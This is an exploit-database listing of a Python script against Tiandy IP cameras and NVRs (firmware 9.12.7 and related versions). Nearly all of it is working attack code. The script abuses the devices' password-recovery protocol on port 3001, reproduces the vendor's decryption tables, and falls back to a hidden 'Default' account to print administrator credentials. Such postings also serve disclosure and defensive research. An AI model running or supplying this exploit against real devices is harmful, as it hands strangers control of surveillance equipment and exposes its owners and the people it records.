Tiandy IPC / NVR 9.12.7 Credential Disclosure

2020.09.13
Credit: zb3
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure # Date: 2020-09-10 # Exploit Author: zb3 # Vendor Homepage: http://en.tiandy.com # Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html # Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html # Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0 # Tested on: Linux # CVE: N/A # Requires Python 3 and PyCrypto # For more details and information on how to escalate this further, see: # https://github.com/zb3/tiandy-research import sys import hashlib import base64 import socket import struct from Crypto.Cipher import DES def main(): if len(sys.argv) != 2: print('python3 %s [host]' % sys.argv[0], file=sys.stderr) exit(1) host = sys.argv[1] conn = Channel(host) conn.connect() crypt_key = conn.get_crypt_key(65536) attempts = 2 tried_to_set_mail = False ok = False while attempts > 0: attempts -= 1 code = get_psw_code(conn) if code == False: # psw not supported break elif code == None: if not tried_to_set_mail: print("No PSW data found, we'll try to set it...", file=sys.stderr) tried_to_set_mail = True if try_set_mail(conn, 'a@a.a'): code = get_psw_code(conn) if code == None: print("couldn't set mail", file=sys.stderr) break rcode, password = recover_with_code(conn, code, crypt_key) if rcode == 5: print('The device is locked, try again later.', file=sys.stderr) break if rcode == 0: print('Admin', password) ok = True break if tried_to_set_mail: try_set_mail(conn, '') if not code: print("PSW is not supported, trying default credentials...", file=sys.stderr) credentials = recover_with_default(conn, crypt_key) if credentials: user, pw = credentials print(user, pw) ok = True if not ok: print('Recovery failed', file=sys.stderr) exit(1) def try_set_mail(conn, target): conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT']) resp = conn.recv_msg() return resp[4:7] == ['RESERVEPHONE', '2', '1'] def get_psw_code(conn): conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1']) resp = conn.recv_msg() if resp[4] != 'FINDPSW': return False psw_reg = psw_data = None if len(resp) > 7: psw_reg = resp[6] psw_data = resp[7] if not psw_data: return None psw_type = int(resp[5]) if psw_type not in (1, 2, 3): raise Exception('unsupported psw type: '+str(psw_type)) if psw_type == 3: psw_data = psw_data.split('"')[3] if psw_type == 1: psw_data = psw_data.split(':')[1] psw_key = psw_reg[:0x1f] elif psw_type in (2, 3): psw_key = psw_reg[:4].lower() psw_code = td_decrypt(psw_data.encode(), psw_key.encode()) code = hashlib.md5(psw_code).hexdigest()[24:] return code def recover_with_code(conn, code, crypt_key): conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT']) resp = conn.recv_msg() rcode = int(resp[6]) if rcode == 0: return rcode, decode(resp[8].encode(), crypt_key).decode() return rcode, None def recover_with_default(conn, crypt_key): res = conn.login_with_key(b'Default', b'Default', crypt_key) if not res: return False while True: msg = conn.recv_msg() if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']: return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode() ### ### lib/des.py ### def reverse_bits(data): return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data]) def pad(data): if len(data) % 8: padlen = 8 - (len(data) % 8) data = data + b'\x00' * (padlen-1) + bytes([padlen]) return data def unpad(data): padlen = data[-1] if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1): data = data[:-padlen] return data def encrypt(data, key): cipher = DES.new(reverse_bits(key), 1) return reverse_bits(cipher.encrypt(reverse_bits(pad(data)))) def decrypt(data, key): cipher = DES.new(reverse_bits(key), 1) return unpad(reverse_bits(cipher.decrypt(reverse_bits(data)))) def encode(data, key): return base64.b64encode(encrypt(data, key)) def decode(data, key): return decrypt(base64.b64decode(data), key) ### ### lib/binproto.py ### def recvall(s, l): buf = b'' while len(buf) < l: nbuf = s.recv(l - len(buf)) if not nbuf: break buf += nbuf return buf class Channel: def __init__(self, ip, port=3001): self.ip = ip self.ip_bytes = socket.inet_aton(ip)[::-1] self.port = port self.msg_seq = 0 self.data_seq = 0 self.msg_queue = [] def fileno(self): return self.socket.fileno() def connect(self): self.socket = socket.socket() self.socket.connect((self.ip, self.port)) def reconnect(self): self.socket.close() self.connect() def send_cmd(self, data): self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data) self.msg_seq += 1 def send_data(self, stream_type, data): self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data) self.data_seq += 1 def recv(self): hdr = recvall(self.socket, 20) if hdr[:4] == b'\xf1\xf5\xea\xf9': lsize, stream_type = struct.unpack('<14xHI', hdr) data = recvall(self.socket, lsize - 20) if data[:4] != b'NVS\x00': print(data[:4], b'NVS\x00') raise Exception('invalid data header') return None, [stream_type, data[8:]] elif hdr[:4] == b'\xf1\xf5\xea\xf5': lsize, dsize = struct.unpack('<6xH10xH', hdr) if lsize != dsize + 20: raise Exception('size mismatch') msgs = [] for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'): msg = msg.split('\t') if '.' not in msg[0]: msg = [self.ip] + msg msgs.append(msg) return msgs, None else: raise Exception('invalid packet magic: ' + hdr[:4].hex()) def recv_msg(self): if len(self.msg_queue): ret = self.msg_queue[0] self.msg_queue = self.msg_queue[1:] return ret msgs, _ = self.recv() if len(msgs) > 1: self.msg_queue.extend(msgs[1:]) return msgs[0] def send_msg(self, msg): self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode()) def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'): self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1']) resp = self.recv_msg() if resp[4:6] != ['LOGONFAILED', '3']: print(resp) raise Exception('unrecognized login response') crypt_key = base64.b64decode(resp[8]) return crypt_key def login_with_key(self, uname, pw, crypt_key): self.reconnect() hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest()) hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest()) self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1']) resp = self.recv_msg() if resp[4] == 'LOGONFAILED': return False self.msg_queue = [resp] + self.msg_queue return True def login(self, uname, pw): crypt_key = self.get_crypt_key(1, uname, pw) if not self.login_with_key(uname, pw, crypt_key): return False return crypt_key ### ### lib/crypt.py ### pat = b'abcdefghijklmnopqrstuvwxyz0123456789' def td_asctonum(code): if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ': code += 0x20 if code not in pat: return None return pat.index(code) def td_numtoasc(code): if code < 36: return pat[code] return None gword = [ b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC', b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta', b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC', b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH', b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt', b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ', b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX', b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1', b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ', b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5', b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG', b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI', b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB', b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb', b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs', b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh', b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX', b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW', b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq', b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU', b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe', b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG', b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1', b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm', b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c', b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5', b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK', b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s', b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR', b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb', b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS', b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54', b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ', b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx', b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ', b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg' ] def td_decrypt(data, key): kdx = 0 ret = [] for idx, code in enumerate(data): while True: if kdx >= len(key): kdx = 0 kcode = key[kdx] knum = td_asctonum(kcode) if knum is None: kdx += 1 continue break if code not in gword[knum]: return None cpos = gword[knum].index(code) ret.append(td_numtoasc(cpos)) kdx += 1 return bytes(ret) if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top